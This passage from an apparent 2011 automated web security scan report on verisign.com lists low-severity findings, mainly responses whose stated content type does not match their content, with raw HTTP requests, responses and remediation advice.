* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* ht
...[SNIP]...

22.52. http://www.verisign.com/authweb/global/assets/shared/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/images/favicon.ico

Request

GET /authweb/global/assets/shared/images/favicon.ico HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621614|session#1315621455064-973488#1315623414|PC#1315621455064-973488.19#1378693554; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:24:14 GMT
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:26:10 GMT
Content-Type: text/html

............ .h.......(....... ..... .....@......................................>...........................................................q...................................9......................
...[SNIP]...

22.53. http://www.verisign.com/authweb/global/assets/shared/js/globals.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/js/globals.js

Request

GET /authweb/global/assets/shared/js/globals.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:17 GMT
Content-Length: 3608
Content-Type: text/html

/*******************************************
** Utility functions **
*******************************************/

function linkPopUp(url) {
popupWin = window.open
...[SNIP]...

22.54. http://www.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.boxshadow.js

Request

GET /authweb/global/assets/shared/js/jquery.boxshadow.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:17 GMT
Content-Length: 1538
Content-Type: text/html

/* **
* jquery-boxshadow.js
*
* $(object).boxshadow({
* hOffset : 3,
* vOffset : 3,
* shadowblur : 3,
* color : '#808080'
* })
*
* If you are using this with IE, you should s
...[SNIP]...

22.55. http://www.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.cacheimage.js

Request

GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:17 GMT
Content-Length: 1356
Content-Type: text/html

/*
* cacheImage: a jQuery plugin
*
* cacheImage is a simple jQuery plugin for pre-caching images. The
* plugin can be used to eliminate flashes of unstyled content (FOUC) and
* improve perceived
...[SNIP]...

22.56. http://www.verisign.com/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js

Request

GET /authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:27:08 GMT
Content-Type: text/html
Content-Length: 15622

/*
* FancyBox - jQuery Plugin
* Simple and fancy lightbox alternative
*
* Examples and documentation at: http://fancybox.net
*
* Copyright (c) 2008 - 2010 Janis Skarnelis
* That said, it is har
...[SNIP]...

22.57. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.hover_intent.js

Request

Response

22.58. http://www.verisign.com/authweb/global/assets/shared/js/jquery.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.js

Request

GET /authweb/global/assets/shared/js/jquery.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:16 GMT
Content-Type: text/html
Content-Length: 78803

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...

22.59. http://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/js/rotator.custom.js

Request

GET /authweb/global/assets/shared/js/rotator.custom.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/ssl/buy-ssl-certificates/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:59:43 GMT
Content-Length: 985
Content-Type: text/html

$(document).ready (function(){
   bannerFadeIn = 0;
   bannerFadeOut = 0;
   $("#prevnext a.prev").click(function(e){
       var currIndex = $("#banner-controls a").index($("#banner-controls a.selected")) +
...[SNIP]...

22.60. http://www.verisign.com/authweb/global/assets/shared/js/rotator.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/js/rotator.js

Request

GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/ssl/buy-ssl-certificates/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:59:43 GMT
Content-Length: 4102
Content-Type: text/html

var activeBannerId = "";
var activeBannerControllerId = "";
var activeTipId = "";
var rotate = true;
var myBannerNumber = 1;
var activeBannerNumber = myBannerNumber;
var bannerItemsLength = $(
...[SNIP]...

22.61. https://www.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/

Request

Response

22.62. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/authweb/global/assets/shared/js/rotator.custom.js

Request

Response

22.63. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/authweb/global/assets/shared/js/rotator.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:27:48 GMT
Content-Length: 4102
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

var activeBannerId = "";
var activeBannerControllerId = "";
var activeTipId = "";
var rotate = true;
var myBannerNumber = 1;
var activeBannerNumber = myBannerNumber;
var bannerItemsLength = $(
...[SNIP]...

23. Content type incorrectly stated previous next
There are 64 instances of this issue:

http://ak.c.ooyala.com/w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG/CG0C0Y8fUuCDotziFhxJgLZO7aYuQRy7
http://cdn.verisign.com/assets/fonts/samd____-webfont.woff
http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
http://cdn.verisign.com/stellent/groups/public/documents/image/dev041741.jpg
https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js
https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js
https://cdn.verisign.com/authweb/global/assets/header/js/header.js
https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
https://cdn.verisign.com/authweb/global/assets/home/js/home.js
https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js
https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js
https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
https://cert.webtrust.org/ViewSeal
http://com-verisign.netmng.com/
https://fileconnect.symantec.com/images/Sigstand.jpg
http://free.pctools.com/favicon.ico
http://gs.instantservice.com/geoipAPI.js
https://idprotect.verisign.com/common/scripts/dlText.js
https://idprotect.verisign.com/imageapp.v
https://idprotect.verisign.com/membersites.v
https://knowledge.verisign.com/favicon.ico
http://mbox3.offermatica.com/m2/verisign/mbox/standard
http://partnerlocator.symantec.com/public/product_finder
http://partnerlocator.symantec.com/public/pulldown_list
http://player.ooyala.com/info/primary/
http://player.ooyala.com/sas/authorized
http://query.verisign.com/cluster
http://sales.liveperson.net/hcp/html/mTag.js
https://seal.verisign.com/getseal
http://sr2.liveperson.net/hcp/html/mTag.js
http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico
http://www.symantec.com/s/searchg/suggest
http://www.symantec.com/search/searchjs.jsp
http://www.verisign.ch/assets/global/js/leftnav.js
http://www.verisign.ch/assets/shared/js/jquery.url.packed.js
http://www.verisign.ch/assets/shared/js/leftnav_new.js
http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js
http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js
http://www.verisign.com/authweb/global/assets/header/js/flyouts.js
http://www.verisign.com/authweb/global/assets/header/js/header.js
http://www.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
http://www.verisign.com/authweb/global/assets/shared/images/favicon.ico
http://www.verisign.com/authweb/global/assets/shared/images/partners-featured-ssl-promo.jpg
http://www.verisign.com/authweb/global/assets/shared/images/ps-freetrial-promo.jpg
http://www.verisign.com/authweb/global/assets/shared/js/globals.js
http://www.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
http://www.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
http://www.verisign.com/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js
http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
http://www.verisign.com/authweb/global/assets/shared/js/jquery.js
http://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
http://www.verisign.com/authweb/global/assets/shared/js/rotator.js
http://www.verisign.com/stellent/groups/public/documents/image/dev041741.jpg
https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
https://www.verisign.com/authweb/global/assets/shared/js/rotator.js

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

23.1. http://ak.c.ooyala.com/w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG/CG0C0Y8fUuCDotziFhxJgLZO7aYuQRy7 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ak.c.ooyala.com
Path:	/w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG/CG0C0Y8fUuCDotziFhxJgLZO7aYuQRy7

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG/CG0C0Y8fUuCDotziFhxJgLZO7aYuQRy7 HTTP/1.1
Host: ak.c.ooyala.com
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
x-amz-id-2: 2C0Xja9JcWvdZkdFgY46HvgLzrDh3/uV5ZIHpKbfgaV7B82NKulzZhMLCgKLiUEC
x-amz-request-id: 2C289606F85CA6E8
Last-Modified: Wed, 24 Mar 2010 20:46:05 GMT
ETag: "e296438fa374f5ed59656563980763eb"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 285
Server: AmazonS3
Cache-Control: max-age=604800
Date: Fri, 09 Sep 2011 21:26:10 GMT
Connection: close

x...=O.0.....[\.s.. ;U.. .e....m.qZ.(...&B ....{w.=.pf..K...)....b@\.._......n..83.m..?X......[......-..n....L.w>..|R.u9}......2......k.#9Z....,p..]..b.B~J.. ...`.....+.$....)..M^6.Ht....L/.D~ ....o..
...[SNIP]...

23.2. http://cdn.verisign.com/assets/fonts/samd____-webfont.woff previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.verisign.com
Path:	/assets/fonts/samd____-webfont.woff

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

Response

23.3. http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.verisign.com
Path:	/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "29304a9-3c47-49d8465fa77c0"
Accept-Ranges: bytes
Content-Type: image/jpeg
Age: 27502
Date: Fri, 09 Sep 2011 21:25:05 GMT
Last-Modified: Wed, 02 Mar 2011 18:51:19 GMT
Expires: Sun, 09 Oct 2011 13:46:43 GMT
Content-Length: 15431
Connection: keep-alive

GIF89a..............Os.............l.qqr.......-...........Yg......"?|NP......................$H..............................NQe.N+.....u.q..........3ny..4^..........<{...............Z:&1......?f....
...[SNIP]...

23.4. http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.verisign.com
Path:	/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "29304aa-381d-49d8465fa77c0"
Accept-Ranges: bytes
Content-Type: image/jpeg
Age: 27502
Date: Fri, 09 Sep 2011 21:25:05 GMT
Last-Modified: Wed, 02 Mar 2011 18:51:19 GMT
Expires: Sun, 09 Oct 2011 13:46:43 GMT
Content-Length: 14365
Connection: keep-alive

GIF89a.....................3.....K..{...................................................................................s...............................s...u....Bh..................... !!.....f...QXVw
...[SNIP]...

23.5. http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.verisign.com
Path:	/authweb/en_ch/assets/shared/js/google-analytics.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.6. http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.cacheimage.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.7. http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/shared.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.8. http://cdn.verisign.com/stellent/groups/public/documents/image/dev041741.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.verisign.com
Path:	/stellent/groups/public/documents/image/dev041741.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /stellent/groups/public/documents/image/dev041741.jpg HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623583|PC#1315621455064-973488.19#1378693723|check#true#1315621783

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "690418-c9f-49a38f3161780"
Accept-Ranges: bytes
Content-Type: image/jpeg
Date: Fri, 09 Sep 2011 21:28:14 GMT
Last-Modified: Wed, 19 Jan 2011 20:34:54 GMT
Expires: Sun, 09 Oct 2011 19:44:53 GMT
Content-Length: 3231
Connection: keep-alive

GIF89a..9.....dz.Ki.e|.....7........".r............D....z........Hd....../22....Ti......iii.)Q...............}}}.....A........+...aaa.....JKK...XXX.$..*J.......q.................Rr........).......f{.
...[SNIP]...

23.9. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://cdn.verisign.com
Path:	/authweb/en_us/assets/shared/js/google-analytics.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.10. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/header/js/flyouts.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/header/js/flyouts.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.11. https://cdn.verisign.com/authweb/global/assets/header/js/header.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/header/js/header.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/header/js/header.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
